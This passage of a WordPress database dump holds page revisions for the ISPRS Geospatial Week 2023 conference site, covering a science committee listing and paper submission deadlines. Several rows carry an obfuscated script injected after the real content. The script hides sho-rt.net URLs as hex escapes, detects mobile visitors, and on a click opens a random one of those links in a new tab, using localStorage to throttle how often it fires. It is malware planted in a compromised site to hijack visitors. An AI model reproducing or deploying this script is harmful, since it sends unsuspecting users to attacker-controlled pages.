x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The ISPRS Geospatial Week (GSW)','','inherit','closed','closed','','2631-autosave-v1','','','2023-02-04 07:05:35','2023-02-04 07:05:35','',2631,'https://gsw2023.com/?p=3767',0,'revision','',0),
(3768,1,'2023-02-04 07:10:39','2023-02-04 07:10:39','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62, 67\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-02-04 07:10:39','2023-02-04 07:10:39','',2876,'https://gsw2023.com/?p=3768',0,'revision','',0),
(3769,1,'2023-02-04 07:12:55','2023-02-04 07:12:55','[vc_row][vc_column][vc_column_text]\r\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\r\n&nbsp;\r\n\r\n[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"three_quarter first\">\r\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\r\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\r\n\r\n</div>\r\n<h5></h5>\r\n<div class=\"three_quarter first\">\r\n<div class=\"gap-10\">\r\n<h5></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\r\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span></b></h1>\r\n<h4>1. Annals (Fully Reviewed Papers):</h4>\r\n<ul>\r\n 	<li><span style=\"font-size: 14pt;\"><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></span></li>\r\n 	<li><span style=\"font-size: 14pt;\"><strong>Full paper Author notification: May 1, 2023</strong></span></li>\r\n 	<li><span style=\"font-size: 14pt;\"><strong>Camera ready paper submission: June 1, 2023</strong></span></li>\r\n</ul>\r\n&nbsp;\r\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\r\n<ul>\r\n 	<li><strong><span style=\"font-size: 14pt;\">Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</span></strong></li>\r\n 	<li><strong><span style=\"font-size: 14pt;\">Abstracts Author notification: May 15, 2023</span></strong></li>\r\n 	<li><strong><span style=\"font-size: 14pt;\">Camera ready paper submission: June 1, 2023</span></strong></li>\r\n</ul>\r\n&nbsp;\r\n<h4><b>Registration deadlines</b></h4>\r\n<ul>\r\n 	<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\"><strong>Early bird registration deadline: May 1, 2023</strong></span></li>\r\n 	<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\"><strong>Late registration deadline: July 1, 2023</strong></span></li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div class=\"three_quarter first\">\r\n<div class=\"gap-50\"></div>\r\n<h5 style=\"color: red;\">Useful links:</h5>\r\n<ul class=\"nospace\">\r\n 	<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\r\n 	<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\r\n</ul>\r\n<div id=\"respond\"></div>\r\n</div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else 